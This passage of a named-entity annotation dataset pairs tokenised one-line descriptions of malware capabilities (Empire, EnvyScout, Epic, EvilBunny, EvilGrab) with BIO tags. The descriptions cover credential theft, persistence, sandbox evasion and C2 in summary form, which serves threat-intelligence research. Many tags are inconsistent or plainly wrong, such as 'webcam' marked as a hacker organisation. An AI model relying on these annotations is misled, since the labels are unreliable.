"O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "includes", - "keylogging", - "capabilities", - "for", - "Windows,", - "Linux,", - "and", - "macOS", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "Inveigh", - "to", - "conduct", - "name", - "service", - "poisoning", - "for", - "credential", - "theft", - "and", - "associated", - "relay", - "attacks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "an", - "implementation", - "of", - "Mimikatz", - "to", - "gather", - "credentials", - "from", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "acquire", - "local", - "and", - "domain", - "user", - "account", - "information." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "a", - "module", - "for", - "creating", - "a", - "local", - "user", - "if", - "permissions", - "allow." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "the", - "ability", - "to", - "collect", - "emails", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "built-in", - "modules", - "to", - "abuse", - "trusted", - "utilities", - "like", - "MSBuild.exe." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "a", - "variety", - "of", - "enumeration", - "modules", - "that", - "have", - "an", - "option", - "to", - "use", - "API", - "calls", - "to", - "carry", - "out", - "tasks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "perform", - "port", - "scans", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "find", - "shared", - "drives", - "on", - "the", - "local", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "be", - "used", - "to", - "conduct", - "packet", - "captures", - "on", - "target", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "perform", - "pass", - "the", - "hash", - "attacks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "path", - "interception", - "opportunities", - "in", - "the", - "PATH", - "environment", - "variable." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "search", - "order", - "hijacking", - "vulnerabilities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "modules", - "that", - "can", - "discover", - "and", - "exploit", - "unquoted", - "path", - "vulnerabilities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Exp" - ] - }, - { - "tokens": [ - "Empire", - "leverages", - "PowerShell", - "for", - "the", - "majority", - "of", - "its", - "client-side", - "agent", - "tasks.", - "Empire", - "also", - "contains", - "the", - "ability", - "to", - "conduct", - "PowerShell", - "remoting", - "with", - "the", - "<code>Invoke-PSRemoting</code>", - "module." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "modules", - "like", - "<code>Invoke-SessionGopher</code>", - "to", - "extract", - "private", - "key", - "and", - "session", - "information." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "find", - "information", - "about", - "processes", - "running", - "on", - "local", - "and", - "remote", - "systems." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "multiple", - "modules", - "for", - "injecting", - "into", - "processes,", - "such", - "as", - "<code>Invoke-PSInject</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "modify", - "the", - "registry", - "run", - "keys", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "and", - "<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "for", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "add", - "a", - "SID-History", - "to", - "a", - "user", - "if", - "on", - "a", - "domain", - "controller." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "contains", - "modules", - "for", - "executing", - "commands", - "over", - "SSH", - "as", - "well", - "as", - "in-memory", - "VNC", - "agent", - "injection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Empire", - "has", - "modules", - "to", - "interact", - "with", - "the", - "Windows", - "task", - "scheduler." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "is", - "capable", - "of", - "capturing", - "screenshots", - "on", - "Windows", - "and", - "macOS", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "enumerate", - "antivirus", - "software", - "on", - "the", - "target." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "enumerate", - "Security", - "Support", - "Providers", - "(SSPs)", - "as", - "well", - "as", - "utilize", - "PowerSploit's", - "<code>Install-SSP</code>", - "and", - "<code>Invoke-Mimikatz</code>", - "to", - "install", - "malicious", - "SSPs", - "and", - "log", - "authentication", - "events." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "PsExec", - "to", - "execute", - "a", - "payload", - "on", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "persist", - "by", - "modifying", - "a", - ".LNK", - "file", - "to", - "include", - "a", - "backdoor." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "leverage", - "its", - "implementation", - "of", - "Mimikatz", - "to", - "obtain", - "and", - "use", - "silver", - "tickets." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "enumerate", - "host", - "system", - "information", - "like", - "OS,", - "architecture,", - "domain", - "name,", - "applied", - "patches,", - "and", - "more." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "acquire", - "network", - "configuration", - "information", - "like", - "DNS", - "servers,", - "public", - "IP,", - "and", - "network", - "proxies", - "used", - "by", - "a", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "enumerate", - "the", - "current", - "network", - "connections", - "of", - "a", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "enumerate", - "the", - "username", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "timestomp", - "any", - "files", - "or", - "payloads", - "placed", - "on", - "a", - "target", - "machine", - "to", - "help", - "them", - "blend", - "in." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "capture", - "webcam", - "data", - "on", - "Windows", - "and", - "macOS", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "conduct", - "command", - "and", - "control", - "over", - "protocols", - "like", - "HTTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Empire", - "has", - "modules", - "for", - "executing", - "scripts." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "use", - "WMI", - "to", - "deliver", - "a", - "payload", - "to", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Empire", - "can", - "utilize", - "built-in", - "modules", - "to", - "modify", - "service", - "binaries", - "and", - "restore", - "them", - "to", - "their", - "original", - "state." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "collect", - "sensitive", - "NTLM", - "material", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "deobfuscate", - "and", - "write", - "malicious", - "ISO", - "files", - "to", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "Base64", - "encode", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "call", - "<code>window.location.pathname</code>", - "to", - "ensure", - "that", - "embedded", - "files", - "are", - "being", - "executed", - "from", - "the", - "C:", - "drive,", - "and", - "will", - "terminate", - "if", - "they", - "are", - "not." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "use", - "protocol", - "handlers", - "to", - "coax", - "the", - "operating", - "system", - "to", - "send", - "NTLMv2", - "authentication", - "responses", - "to", - "attacker-controlled", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "contains", - "JavaScript", - "code", - "that", - "can", - "extract", - "an", - "encoded", - "blob", - "from", - "its", - "HTML", - "body", - "and", - "write", - "it", - "to", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "use", - "hidden", - "directories", - "and", - "files", - "to", - "hide", - "malicious", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "write", - "files", - "to", - "disk", - "with", - "JavaScript", - "using", - "a", - "modified", - "version", - "of", - "the", - "open-source", - "tool", - "FileSaver." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EnvyScout", - "has", - "been", - "executed", - "through", - "malicious", - "files", - "attached", - "to", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EnvyScout", - "has", - "used", - "folder", - "icons", - "for", - "malicious", - "files", - "to", - "lure", - "victims", - "into", - "opening", - "them." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "has", - "the", - "ability", - "to", - "proxy", - "execution", - "of", - "malicious", - "files", - "with", - "Rundll32." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "has", - "been", - "distributed", - "via", - "spearphishing", - "as", - "an", - "email", - "attachment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "determine", - "whether", - "the", - "ISO", - "payload", - "was", - "received", - "by", - "a", - "Windows", - "or", - "iOS", - "device." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EnvyScout", - "can", - "use", - "cmd.exe", - "to", - "execute", - "malicious", - "files", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "encrypts", - "collected", - "data", - "using", - "a", - "public", - "key", - "framework", - "before", - "sending", - "it", - "over", - "the", - "C2", - "channel.", - "Some", - "variants", - "encrypt", - "the", - "collected", - "data", - "with", - "AES", - "and", - "encode", - "it", - "with", - "base64", - "before", - "transmitting", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "compresses", - "the", - "collected", - "data", - "with", - "bzip2", - "before", - "sending", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "valid", - "digital", - "certificates", - "from", - "Sysprint", - "AG", - "to", - "sign", - "its", - "Epic", - "dropper." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Epic", - "has", - "overwritten", - "the", - "function", - "pointer", - "in", - "the", - "extra", - "window", - "memory", - "of", - "Explorer's", - "Shell_TrayWnd", - "in", - "order", - "to", - "execute", - "malicious", - "code", - "in", - "the", - "context", - "of", - "the", - "explorer.exe", - "process." - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Epic", - "has", - "a", - "command", - "to", - "delete", - "a", - "file", - "from", - "the", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "recursively", - "searches", - "for", - "all", - ".doc", - "files", - "on", - "the", - "system", - "and", - "collects", - "a", - "directory", - "listing", - "of", - "the", - "Desktop,", - "%TEMP%,", - "and", - "%WINDOWS%\\Temp", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Epic", - "gathers", - "a", - "list", - "of", - "all", - "user", - "accounts,", - "privilege", - "classes,", - "and", - "time", - "of", - "last", - "logon." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "gathers", - "information", - "on", - "local", - "group", - "names." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "heavily", - "obfuscates", - "its", - "code", - "to", - "make", - "analysis", - "more", - "difficult." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>tasklist", - "/v</code>", - "command", - "to", - "obtain", - "a", - "list", - "of", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>rem", - "reg", - "query</code>", - "command", - "to", - "obtain", - "values", - "from", - "Registry", - "keys." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>net", - "view</code>", - "command", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "searches", - "for", - "anti-malware", - "services", - "running", - "on", - "the", - "victim’s", - "machine", - "and", - "terminates", - "itself", - "if", - "it", - "finds", - "them." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "encrypts", - "commands", - "from", - "the", - "C2", - "server", - "using", - "a", - "hardcoded", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "collects", - "the", - "OS", - "version,", - "hardware", - "information,", - "computer", - "name,", - "available", - "system", - "memory", - "status,", - "disk", - "space", - "information,", - "and", - "system", - "and", - "user", - "language", - "settings." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>nbtstat", - "-n</code>", - "and", - "<code>nbtstat", - "-s</code>", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>net", - "use</code>,", - "<code>net", - "session</code>,", - "and", - "<code>netstat</code>", - "commands", - "to", - "gather", - "information", - "on", - "network", - "connections." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "collects", - "the", - "user", - "name", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>tasklist", - "/svc</code>", - "command", - "to", - "list", - "the", - "services", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "the", - "<code>net", - "time</code>", - "command", - "to", - "get", - "the", - "system", - "time", - "from", - "the", - "machine", - "and", - "collect", - "the", - "current", - "date", - "and", - "time", - "zone", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Epic", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "exploited", - "CVE-2011-4369,", - "a", - "vulnerability", - "in", - "the", - "PRC", - "component", - "in", - "Adobe", - "Reader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "deleted", - "the", - "initial", - "dropper", - "after", - "running", - "through", - "the", - "environment", - "checks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "downloaded", - "additional", - "Lua", - "scripts", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "used", - "various", - "API", - "calls", - "as", - "part", - "of", - "its", - "checks", - "to", - "see", - "if", - "the", - "malware", - "is", - "running", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "used", - "EnumProcesses()", - "to", - "identify", - "how", - "many", - "process", - "are", - "running", - "in", - "the", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "created", - "Registry", - "keys", - "for", - "persistence", - "in", - "<code>[HKLM|HKCU]\\…\\CurrentVersion\\Run</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "executed", - "commands", - "via", - "scheduled", - "tasks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "been", - "observed", - "querying", - "installed", - "antivirus", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny's", - "dropper", - "has", - "checked", - "the", - "number", - "of", - "processes", - "and", - "the", - "length", - "and", - "strings", - "of", - "its", - "own", - "file", - "name", - "to", - "identify", - "if", - "the", - "malware", - "is", - "in", - "a", - "sandbox", - "environment." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "used", - "the", - "API", - "calls", - "NtQuerySystemTime,", - "GetSystemTimeAsFileTime,", - "and", - "GetTickCount", - "to", - "gather", - "time", - "metrics", - "as", - "part", - "of", - "its", - "checks", - "to", - "see", - "if", - "the", - "malware", - "is", - "running", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "used", - "time", - "measurements", - "from", - "3", - "different", - "APIs", - "before", - "and", - "after", - "performing", - "sleep", - "operations", - "to", - "check", - "and", - "abort", - "if", - "the", - "malware", - "is", - "running", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "executed", - "C2", - "commands", - "directly", - "via", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "an", - "integrated", - "scripting", - "engine", - "to", - "download", - "and", - "execute", - "Lua", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilBunny", - "has", - "used", - "WMI", - "to", - "gather", - "information", - "about", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilGrab", - "has", - "the", - "capability", - "to", - "capture", - "audio", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilGrab", - "has", - "the", - "capability", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "EvilGrab", - "adds", - "a", - "Registry", - "Run", - "key", - "for", - "ctfmon.exe", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "EvilGrab", - "has", - "the", - "capability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - 